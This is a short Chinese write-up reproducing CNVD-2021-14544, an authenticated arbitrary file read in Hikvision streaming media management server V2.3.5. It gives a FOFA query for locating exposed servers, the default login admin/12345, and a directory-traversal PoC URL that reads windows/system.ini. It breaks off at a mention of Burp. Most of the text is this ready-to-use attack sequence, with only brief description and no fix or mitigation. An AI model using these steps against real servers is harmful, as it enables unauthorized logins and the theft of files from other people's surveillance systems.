(CNVD-2021-14544)海康威视流媒体管理服务器后台任意文件读取漏洞复现

一、漏洞描述

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞，攻击者可利用该漏洞获取敏感信息。

二、影响范围

海康威视流媒体管理服务器 V2.3.5

三、漏洞利用

fofa搜索：title="流媒体管理服务器"

随便进入一个可以看到后台登录界面

使用弱口令admin/12345可成功登录，登录之后可读取文件，poc如下:

http://xxx.xxx.xxx.xxx:xx/systemLog/downFile.phpfileName=../../../../../../../windows/system.ini

读取的文件内容如下:

 

或者登录成功之后用burp利用漏洞,如下: